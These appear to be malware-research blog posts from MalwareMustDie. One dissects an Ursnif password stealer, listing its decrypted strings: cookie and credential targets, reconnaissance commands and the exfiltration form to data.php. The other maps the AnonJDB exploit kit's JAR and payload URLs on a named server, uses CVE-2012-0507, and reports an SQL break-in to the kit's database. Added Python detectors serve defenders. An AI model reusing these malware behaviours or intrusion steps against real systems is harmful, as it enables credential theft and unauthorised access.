"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet","SUCCESS","Type: REG_DWORD, Length: 4, Data: 1"
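The two behaviours traced above, a self-copy into system32 that is immediately registered under a randomly named Run value, and a dropped .bat handed to cmd.exe so that the original file can delete itself, are both easy to miss when read as single Process Monitor rows but stand out when correlated per process. As an added example (not from the post), the Python below reads a Process Monitor style CSV and reports a Run-key value whose target was written by the same process, and a cmd.exe launch of a batch file that the same process had just written. The column layout and every row are constructed for the demonstration, modelled on the traces quoted in the post.

```python
import csv
import io
import re

# Autostart registry locations worth correlating against file writes.
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\",
                        re.IGNORECASE)
DATA_RE = re.compile(r"Data:\s*(.+?)\s*$")
CMDLINE_RE = re.compile(r"Command line:\s*(.+?)\s*$")
BAT_PATH_RE = re.compile(r"([A-Za-z]:\\[^\"]+?\.bat)", re.IGNORECASE)

# Constructed Process Monitor style CSV (assumed column layout; not the post's own log).
# It replays the sequence described above plus two unrelated rows as noise.
SAMPLE_CSV = r"""
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"22:17:40","dune.exe","2880","CreateFile","C:\WINDOWS\system32\fastinit.exe","SUCCESS","Desired Access: Generic Write, OpenResult: Created"
"22:17:40","dune.exe","2880","WriteFile","C:\WINDOWS\system32\fastinit.exe","SUCCESS","Offset: 0, Length: 226304"
"22:17:41","dune.exe","2880","RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Run\helplist","SUCCESS","Type: REG_SZ, Length: 66, Data: C:\WINDOWS\system32\fastinit.exe"
"22:17:41","dune.exe","2880","WriteFile","C:\Documents and Settings\user\Desktop\1958718.bat","SUCCESS","Offset: 0, Length: 72"
"22:17:42","dune.exe","2880","Process Create","C:\WINDOWS\system32\cmd.exe","SUCCESS","PID: 2916, Command line: cmd /c C:\Documents and Settings\user\Desktop\1958718.bat"
"22:18:05","explorer.exe","1420","RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop","SUCCESS","Type: REG_SZ, Length: 74, Data: C:\Documents and Settings\user\Desktop"
"22:18:30","setup.exe","3100","RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater","SUCCESS","Type: REG_SZ, Length: 60, Data: C:\Program Files\Vendor\updater.exe"
""".strip()


def analyse_procmon_csv(text):
    """Correlate file writes with autorun registry writes and cmd.exe launches.

    Returns a list of findings in log order; each is a dict with 'kind', 'pid',
    'process', 'target' and 'key'.
    """
    written = set()          # (pid, lower-cased path) for files this PID created or wrote
    findings = []
    for row in csv.DictReader(io.StringIO(text)):
        pid, proc, op = row["PID"], row["Process Name"], row["Operation"]
        path, detail = row["Path"], row["Detail"]

        if op == "WriteFile" or (op == "CreateFile" and "OpenResult: Created" in detail):
            written.add((pid, path.lower()))

        elif op == "RegSetValue" and RUN_KEY_RE.search(path):
            m = DATA_RE.search(detail)
            target = m.group(1) if m else ""
            # A Run value pointing at a file the same process just wrote is the
            # self-copy-plus-autostart pattern; any other Run write is reported too.
            kind = "autorun-self-written" if (pid, target.lower()) in written else "autorun"
            findings.append({"kind": kind, "pid": pid, "process": proc,
                             "target": target, "key": path})

        elif op == "Process Create" and path.lower().endswith("\\cmd.exe"):
            m = CMDLINE_RE.search(detail)
            bat = BAT_PATH_RE.search(m.group(1)) if m else None
            if bat and (pid, bat.group(1).lower()) in written:
                findings.append({"kind": "self-written-batch-via-cmd", "pid": pid,
                                 "process": proc, "target": bat.group(1), "key": None})
    return findings


if __name__ == "__main__":
    for f in analyse_procmon_csv(SAMPLE_CSV):
        print(f"{f['kind']:28} {f['process']} (PID {f['pid']}) -> {f['target']}")
```

On the sample it reports the fastinit.exe autorun as self-written, the batch launch, and the setup.exe Run value as a plain autorun (its target was not written in this capture), which is the difference between an installer and the pattern in this post.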
Since the malware binary is encrypted, we can't see much of it; if you look at the binary's .text section it appears like this:
File: dune.exe; Section: .text
Encrypted part:
0x0004FF 0x0004FF >====
0x000515 0x000515 ====6?y>6?y
0x00052B 0x00052B 5=Hh2
0x000531 0x000531 2====a
0x00055B 0x00055B c>====
0x000582 0x000582 >?Ay=|=
0x0005A9 0x0005A9 Rn=y=
0x0005AF 0x0005AF 35Ln=y=
0x0005E0 0x0005E0 3>====
0x000610 0x000610 ===g===
0x00062D 0x00062D %,A>h
0x000645 0x000645 a5===
0x0006BD 0x0006BD n====g==5==
: : :
0x03646F 0x03646F R |=A3
0x03662A 0x03662A %H2%n?
0x036642 0x036642 A57 >
0x03668E 0x03668E >6=dg>
The complete list is here -->>[HERE], but after decryption we start to understand better how it works. The .rdata section appears to contain some values. The list of calls is here -->>[HERE]. And the breakdown of the stealer++ activities is as below. Some comments of the malware coder, with misspelled words:
.rdata:100124E4 00000010 C Sart Load DLL\r\n                  
.rdata:100124F4 0000001D C Loading DLL: \"%s\" size: %d\r\n
.rdata:10012514 00000012 C Start Write DLL\r\n
.rdata:10012528 00000016 C DLL load status: %u\r\n
.rdata:10012658 0000001C C Started Soccks status {%u\n}
.rdata:10012674 00000014 C Get info status %u\n
.rdata:10012688 00000017 C Command received \"%s\"\n
.rdata:100126A0 0000000C C MakeScreen\n
So it is supposed to connect to the internet...
.rdata:10012C64 00000008 C http://                       
.rdata:10012C6C 00000009 C https://
.rdata:10012A94 00000006 C Host:
.rdata:10012A9C 0000000C C User-Agent:
.rdata:10012AA8 00000010 C Content-Length:
.rdata:10012AB8 00000013 C Transfer-Encoding:
.rdata:10012BDC 0000000A C text/html
.rdata:10012BE8 00000006 C image
.rdata:10012BF0 0000000A C Referer:
.rdata:10012BFC 0000001A C URL: %s\r\nuser=%s\r\npass=%s
While these show what it grabs (an Ursnif trademark):
.rdata:10012CA4 00000005 C @ID@       
.rdata:10012CB0 00000008 C @GROUP@
.rdata:10012CB8 00000007 C grabs=
.rdata:10012CC0 00000008 C NEWGRAB
.rdata:10012CC8 0000000B C SCREENSHOT
.rdata:10012CD4 00000008 C PROCESS
.rdata:10012CDC 00000007 C HIDDEN
.rdata:10012CE4 00000005 C @%s@
.rdata:10012CEC 00000005 C http
.rdata:10012CF4 00000005 C POST
.rdata:10012CFC 0000000A C URL: %s\r\n
..or this one will show you better...
.rdata:10012948 0000001D C cmd /C \"systeminfo.exe > %s\"    
.rdata:10012968 0000001B C failed start sysinfo - %u\n
.rdata:10012984 0000001D C cmd /C \"echo -------- >> %s\"
.rdata:100129A4 00000021 C cmd /C \"tasklist.exe /SVC >> %s\"
.rdata:100129C8 0000001C C failed start tasklist - %u\n
.rdata:100129E4 0000001F C cmd /C \"driverquery.exe >> %s\"
.rdata:10012A04 0000001A C failed start driver - %u\n
.rdata:10012A20 0000005B C cmd /C \"reg.exe query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" /s >> %s\
.rdata:10012A7C 00000015 C failed get reg - %u\n
The credentials targeted:
0x010F44   \Mozilla\Firefox\Profiles\
0x010F7C cookies.sqlite
0x010F9C cookies.sqlite-journal
0x010FCC \Macromedia\Flash Player\
0x011000 *.sol
0x01100C *.txt
0x011018 \sols
0x011024 \cookie.ie
0x01103C \cookie.ff
0x011678 image/gif
We'll see usage of a PHP form on the server side:
.rdata:100126E8 00000005 C form
.rdata:100126F0 0000004B C /data.php?version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
.rdata:10012758 0000007B C version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%08X&wake=%u&prjct=%d&arch=%u&inf=0&os=%u.%u.%u&guid=%u.%u.%u!%s!%08X
.rdata:100127D8 0000000D C /c%s.php?%s=
:
.rdata:10012E10 00000042 C Content-Disposition: form-data; name=\"upload_file\"; filename=\"%s\"
.rdata:10012E58 00000048 C Content-Disposition: form-data; name=\"upload_file\"; filename=\"%.4u.%lu\"
.rdata:10012EA0 00000027 C --------------------------%04x%04x%04x
.rdata:10012EC8 0000002F C Content-Type: multipart/form-data; boundary=%s
.rdata:10012EF8 0000000B C \r\n--%s--\r\n
.rdata:10012F04 00000027 C Content-Type: application/octet-stream
.rdata:10012F2C 00000011 C --%s\r\n%s\r\n%s\r\n\r\n
Setting the target directory for grabbing stuff:
.rdata:100128A4 0000001B C .set DiskDirectory1=\"%s\"\r\n  
.rdata:100128C0 00000019 C .set CabinetName1=\"%s\"\r\n
.rdata:100128DC 00000007 C \"%s\"\r\n
.rdata:100128EC 0000001B C .set DestinationDir=\"%S\"\r\n
.rdata:1001290C 00000007 C \"%S\"\r\n
And making a CAB archive of the target:
.rdata:10012914 00000014 C makecab.exe /F \"%s\
I thank @EP_X0FF of kernelmode for the very good help solving this mystery. It is a PWS variant alright, with the malware name Trojan Ursnif. The complete list of the .rdata section is here -->>[HERE]

Samples

*) We share samples for research purposes and to raise the detection ratio of this infection. Infection sample set -->>[HERE]. The complete recorded malware process can be downloaded as an archive here -->>[HERE]. Thanks to @kafeine for the infection info.
#MalwareMustDie!

Saturday, 2 February 2013

This is the continuation of the previous post on peeling apart the Anon JDB Exploit Kit.
You can read the previous post here -->>[HERE]

We learned a lot from this EK's landing page infection scheme in the previous post,
but we couldn't fetch the JAR properly, so we missed the exploitation scheme of this EK.
I didn't give up; after digging and praying, bumping into nonsense here and there,
we were contacted by fellow VirusTotal researcher @cyberup
with very good advice about Anon JDB EK's JAR, which I share below:
That AnonJDB is first of all very vulnerable to SQL,
so with permission from the owner it's easy to get their DB and files
to see what's what.
↑Indeed a crusader's prayers were answered, a light from God;
with gratitude I hurried to follow the tips and re-whacked the
exploit servers, getting these JARs with... a bunch of NEW PAYLOADS!

Kindly allow me to explain the exploit and the payload details
as per below:

The relation between Anon JDB Exploit Kit's JAR and Payload


First of all, the JDB exploit kit uses an infection ID that is MD5 hashed.
If we get the right hash, then we know the JAR and the payload.
By understanding this and using the advice above, we figured out the path
of the JAR and how it links to the payload, as in the following example:
Say the hash is "xxxx1234".
Then the JAR will be at [INFECTOR-DOMAIN]/jdb/lib/java/lives/xxxx1234
with the payload URL [INFECTOR-DOMAIN]/jdb/lib/load.php?id=xxxx1234

In our case, the JAR file download URLs are as follows:
h00p://212,7,192,100/jdb/lib/java/lives/000316fe5ab4f8c78ff2ea65fd2d9656.jar
h00p://212,7,192,100/jdb/lib/java/lives/00810c54efd040c1491d1ef9c53736a8.jar
h00p://212,7,192,100/jdb/lib/java/lives/35b1ae64e88f3cab77c8beb9b00b6764.jar
h00p://212,7,192,100/jdb/lib/java/lives/39fcb841479cb7e82f645399116c48f2.jar
h00p://212,7,192,100/jdb/lib/java/lives/47a37dc86aab9c56f0d03f1ea22fa352.jar
h00p://212,7,192,100/jdb/lib/java/lives/689cfedf4da4270a472b7e6ee0eab835.jar
h00p://212,7,192,100/jdb/lib/java/lives/8992af86e38418612bd4c09aac40e180.jar
h00p://212,7,192,100/jdb/lib/java/lives/a9d1c1325864c7679519247fb1c2757d.jar
h00p://212,7,192,100/jdb/lib/java/lives/c9f667dfe828de36d7c10491d408838b.jar
h00p://212,7,192,100/jdb/lib/java/lives/d9f9133fb120cd6096870bc2b496805b.jar
h00p://212,7,192,100/jdb/lib/java/lives/e686d160e88d62ca8f8d4f2780f0b64d.jar
h00p://212,7,192,100/jdb/lib/java/lives/ef00ab8fca7d43c1ade8c391dd5e845d.jar

While the related payloads are as follows:
h00p://212,7,192,100/jdb/lib/load.php?id=000316fe5ab4f8c78ff2ea65fd2d9656
h00p://212,7,192,100/jdb/lib/load.php?id=00810c54efd040c1491d1ef9c53736a8
h00p://212,7,192,100/jdb/lib/load.php?id=35b1ae64e88f3cab77c8beb9b00b6764
(No Data)
h00p://212,7,192,100/jdb/lib/load.php?id=47a37dc86aab9c56f0d03f1ea22fa352
h00p://212,7,192,100/jdb/lib/load.php?id=689cfedf4da4270a472b7e6ee0eab835
h00p://212,7,192,100/jdb/lib/load.php?id=8992af86e38418612bd4c09aac40e180
h00p://212,7,192,100/jdb/lib/load.php?id=a9d1c1325864c7679519247fb1c2757d
h00p://212,7,192,100/jdb/lib/load.php?id=c9f667dfe828de36d7c10491d408838b
h00p://212,7,192,100/jdb/lib/load.php?id=d9f9133fb120cd6096870bc2b496805b
h00p://212,7,192,100/jdb/lib/load.php?id=e686d160e88d62ca8f8d4f2780f0b64d
(No Data)
*) No Data = the JAR did not contain a payload download URL.
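The one-to-one link between the JAR hash and the load.php id described above is also what a defender can key on in proxy logs. The following is an added example (not code from the post) that classifies requests by that URL scheme and reports, per client and hash, whether only the JAR was fetched or the payload request followed it. The log lines are constructed for the demo; the infector host is the one the post names, written with dots instead of the post's comma defanging.

```python
"""Correlate AnonJDB-style JAR fetches with their load.php payload requests.

Added example, not the post's own code. It assumes the URL scheme the post
describes: /jdb/lib/java/lives/<md5>.jar is the exploit JAR and
/jdb/lib/load.php?id=<md5> is the payload request carrying the same hash.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

JAR_RE = re.compile(r"^/jdb/lib/java/lives/([0-9a-f]{32})\.jar$")
PAYLOAD_PATH = "/jdb/lib/load.php"
MD5_RE = re.compile(r"[0-9a-f]{32}")

# Constructed proxy log lines: "<time> <client> <method> <url> <status>".
# Hashes are two of the JAR names from the post; clients are made up.
SAMPLE_LOG = """\
2013-02-02T06:37:30Z 10.0.0.5 GET http://212.7.192.100/jdb/lib/java/lives/00810c54efd040c1491d1ef9c53736a8.jar 200
2013-02-02T06:37:31Z 10.0.0.5 GET http://212.7.192.100/jdb/lib/load.php?id=00810c54efd040c1491d1ef9c53736a8 200
2013-02-02T06:40:02Z 10.0.0.9 GET http://212.7.192.100/jdb/lib/java/lives/39fcb841479cb7e82f645399116c48f2.jar 200
2013-02-02T06:41:10Z 10.0.0.7 GET http://example.invalid/index.html 200
2013-02-02T06:42:00Z 10.0.0.11 GET http://212.7.192.100/jdb/lib/load.php?id=zzzz 200
"""


def classify(url):
    """Return ("jar", md5), ("payload", md5) or None for one URL."""
    parts = urlparse(url)
    m = JAR_RE.match(parts.path)
    if m:
        return ("jar", m.group(1))
    if parts.path == PAYLOAD_PATH:
        ids = parse_qs(parts.query).get("id", [])
        # Only a 32-hex id matches the kit's scheme; anything else is noise.
        if ids and MD5_RE.fullmatch(ids[0]):
            return ("payload", ids[0])
    return None


def correlate(log_text):
    """Group successful hits by (client, md5) and name the stage reached."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        _, client, _, url, status = fields[:5]
        hit = classify(url)
        if hit and status == "200":
            stage, md5 = hit
            seen[(client, md5)].add(stage)

    report = {}
    for key, stages in seen.items():
        if stages == {"jar", "payload"}:
            report[key] = "jar+payload: likely successful exploitation"
        elif stages == {"jar"}:
            report[key] = "jar only: exploit delivered, payload not fetched"
        else:
            report[key] = "payload only: check for a missed JAR request"
    return report


if __name__ == "__main__":
    for (client, md5), verdict in sorted(correlate(SAMPLE_LOG).items()):
        print(f"{client:10} {md5}  {verdict}")
```

A client that shows both stages for the same hash is the first one to pull for host forensics; a JAR-only hit still means the exploit reached the browser, so it is worth a look even when no payload followed.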

The JAR files

So we fetched the JARs, with the below snip of the response logs:
   : 
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Sat, 02 Feb 2013 06:37:30 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 27 Jan 2013 11:58:55 GMT
ETag: "cf0522-f99-e2835dc0"
Accept-Ranges: bytes
Content-Length: 3993
Connection: close
Content-Type: application/x-java-archive
200 OK
Length: 3993 (3.9K) [application/x-java-archive]
Saving to: `00810c54efd040c1491d1ef9c53736a8.jar'
2013-02-02 15:36:52 (57.0 MB/s) - `00810c54efd040c1491d1ef9c53736a8.jar' saved [3993/3993]
Nothing "fancy" in fetching them and, yes, we got them all. This is what happens if you access the JAR directly from Firefox:

Exploit & infection method used in the JARs

I will explain it step by step; this is going to be a bit long, so please bear with the details.
The JARs and the list of CVE exploitation used + payload names:
----------------------------------------------------------------
000316fe5ab4f8c78ff2ea65fd2d9656.jar  CVE-2012-0507  (java.exe)
00810c54efd040c1491d1ef9c53736a8.jar  CVE-2012-0507  (Flash.exe)
35b1ae64e88f3cab77c8beb9b00b6764.jar  CVE-2012-0507  (hwid.exe)
39fcb841479cb7e82f645399116c48f2.jar  XXXXX          (XXXXX)
47a37dc86aab9c56f0d03f1ea22fa352.jar  CVE-2012-0507  (XXX 0byte/sexecam.exe)
689cfedf4da4270a472b7e6ee0eab835.jar  CVE-2012-0507  (javaupdate.exe)
8992af86e38418612bd4c09aac40e180.jar  CVE-2012-0507  (file.exe / a downloader script)
a9d1c1325864c7679519247fb1c2757d.jar  CVE-2012-0507  (AdobeFlash.exe)
c9f667dfe828de36d7c10491d408838b.jar  CVE-2012-0507  (host.exe / a downloader script)
d9f9133fb120cd6096870bc2b496805b.jar  CVE-2012-0507  (sdsf.exe)
e686d160e88d62ca8f8d4f2780f0b64d.jar  CVE-2012-0507  (eafaeeef.exe)
ef00ab8fca7d43c1ade8c391dd5e845d.jar  XXXXX          (XXXXX)

PoC of CVE-2012-0507 used:

The summary is: by using a BufferedOutputStream flooded with writes of byte arrays, the JAR exploits the Java Runtime Environment to gain the privilege to execute the download, then calls LocalRunTime.Exec() to run the malware.
The BufferedOutputStream/CVE-2012-0507 traces:
Exploit Methods:

PoC of Infection traces:

The download URL, the path where the payload is saved, the payload's execution calls, and the URL reference: upon successful exploitation you will also be linked to a malware-related URL (in the sample below it is http:// or undefined), like the sample below.
↑ See the purple mark of the reference URL.
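The traces listed above (download URL, drop path, execution call, stream class) are the strings an analyst pulls out of each JAR before touching the payload. The following is an added example, not the post's own code, that does that triage statically: it unpacks a JAR in memory, extracts printable-string runs from every entry and matches them against indicator patterns. The JAR it scans is constructed here (a fake class entry whose bytes carry strings of the kinds the post describes), so host, path and filenames are stand-ins; on a real case the same function is run over the downloaded JAR. BufferedOutputStream is the trace the post names; AtomicReferenceArray is the class that public CVE-2012-0507 write-ups name, included as an assumption.

```python
"""Static string triage of a JAR for infection indicators.

Added example, not the post's own code. The sample JAR is constructed in
memory; all hosts, paths and names in it are made up for the demo.
"""
import io
import re
import zipfile

# Printable-ASCII runs of 4+ bytes, like the classic `strings` tool.
STRING_RE = re.compile(rb"[\x20-\x7e]{4,}")

INDICATORS = {
    # Where the payload is fetched from (the load.php?id=<hash> style URL).
    "download_url": re.compile(r"https?://[^\s\"']+"),
    # Where the payload is written before it is run.
    "drop_path": re.compile(r"(?i)(?:%temp%|c:\\|/tmp/)[^\s\"']*\.exe"),
    # Process execution via java.lang.Runtime / exec.
    "exec_call": re.compile(r"java/lang/Runtime|\bexec\b"),
    # Classes tied to the exploit stage (assumption: see lead-in).
    "exploit_trace": re.compile(r"BufferedOutputStream|AtomicReferenceArray"),
}


def build_constructed_jar():
    """Return bytes of a constructed JAR with class-like constant strings."""
    fake_class = (
        b"\xca\xfe\xba\xbe\x00\x00\x00\x32"        # class magic + version
        b"\x01\x00\x11java/lang/Runtime"           # CONSTANT_Utf8-style entries
        b"\x01\x00\x04exec"
        b"\x01\x00\x1cjava/io/BufferedOutputStream"
        b"\x01\x00\x34http://infector.invalid/jdb/lib/load.php?id=deadbeef"
        b"\x01\x00\x11%TEMP%\\update.exe"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("Loader.class", fake_class)
    return buf.getvalue()


def extract_strings(data):
    """Return printable-ASCII runs found in a byte blob."""
    return [m.group(0).decode("ascii") for m in STRING_RE.finditer(data)]


def triage_jar(jar_bytes):
    """Return {indicator: sorted matching strings} across all JAR entries."""
    hits = {key: set() for key in INDICATORS}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for name in zf.namelist():
            for s in extract_strings(zf.read(name)):
                for key, pat in INDICATORS.items():
                    for m in pat.finditer(s):
                        hits[key].add(m.group(0))
    return {key: sorted(v) for key, v in hits.items()}


if __name__ == "__main__":
    for key, values in triage_jar(build_constructed_jar()).items():
        print(f"{key:14} {values}")
```

Raw string runs, rather than a constant-pool parse, are deliberate: obfuscated kits split or encode strings, and a string pass over every entry (including resources and nested JARs) catches the pieces a class parser would skip. An empty result for every indicator is itself useful, as it means the sample needs dynamic analysis instead.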

PoC of all the JAR + Download URL + Payload snapshot

All of the JARs detected on this AnonJDB EK server use the same exploit & infection method, as per below. I detected 7 (seven) PE payload malware and 2 (two) payloads of HTML w/JavaScript that are downloaders of OTHER malware, plus 2 inactive JARs and 1 unavailable payload. Including the previous post's sample, the total is 13 (thirteen) infection schemes within the one IP 212,7,192,100.
Below is the snapshot of the infector code used, one by one:
000316fe5ab4f8c78ff2ea65fd2d9656.jar
00810c54efd040c1491d1ef9c53736a8.jar
35b1ae64e88f3cab77c8beb9b00b6764.jar
39fcb841479cb7e82f645399116c48f2.jar ((received 0byte file download))
689cfedf4da4270a472b7e6ee0eab835.jar
8992af86e38418612bd4c09aac40e180.jar
a9d1c1325864c7679519247fb1c2757d.jar
c9f667dfe828de36d7c10491d408838b.jar
d9f9133fb120cd6096870bc2b496805b.jar
e686d160e88d62ca8f8d4f2780f0b64d.jar

Conclusion:

1. With this post we conclude the research of the Anon JDB Exploit Kit.
2. So many infection schemes (fake updater / fake site) can be used by this Exploit Kit.
3. The usage of an SQL database lets AnonJDB provide many infection schemes.
4. We need to shut down the 212,7,192,100 infector right away; this post can be used as evidence.

Samples

For research purposes & to raise the detection ratio of these malwares, I hereby share the samples (JARs + payloads) here -->>[HERE]
Payload MD5 details:
Date        Time   Size       File            MD5
2013/02/02  16:40  842,955    AdobeFlash.exe  5ae6434a9c00f57db6b8d80a0e07d551
2013/02/02  17:07  257,536    eafaeeef.exe    434cb440d3960e3dc5dc5e5762cf641f
2013/02/02  16:28  17,534     file.exe        510e954ee7fd8542ba38a12e73aa8dad
2013/02/02  15:41  363,008    Flash.exe       fd1f42ec224f16d4586d3e807aea65d3
2013/02/02  16:51  67,805     host.exe        c2706e1ee737fc9e5f5a05f3def5af93
2013/02/02  16:02  10,240     hwid.exe        44fef11ca8263ec8ff2879d492d8fb4c
2013/02/02  15:40  503,296    java.exe        521f94e1bf48d808cd02550c9dbcf976
2013/02/02  16:18  429,048    javaupdate.exe  440a5a869cb42ca95dc39524f7627217
2013/02/02  17:00  1,798,085  sdsf.exe        92f03b79b265b6cb10e11c19a3462bbb
VirusTotal detection ratio (some of the new payloads are poorly detected):
AdobeFlash.exe (17/46) -->>[VT-Result]
eafaeeef.exe (42/46) -->>[VT-Result]
file.exe (0/46) -->>[VT-Result]
Flash.exe (13/46) -->>[VT-Result]
host.exe (0/46) -->>[VT-Result]
hwid.exe (4/46) -->>[VT-Result]
java.exe (7/46) -->>[VT-Result]
javaupdate.exe (5/44) -->>[VT-Result]
sdsf.exe (5/46) -->>[VT-Result]
#MalwareMustDie!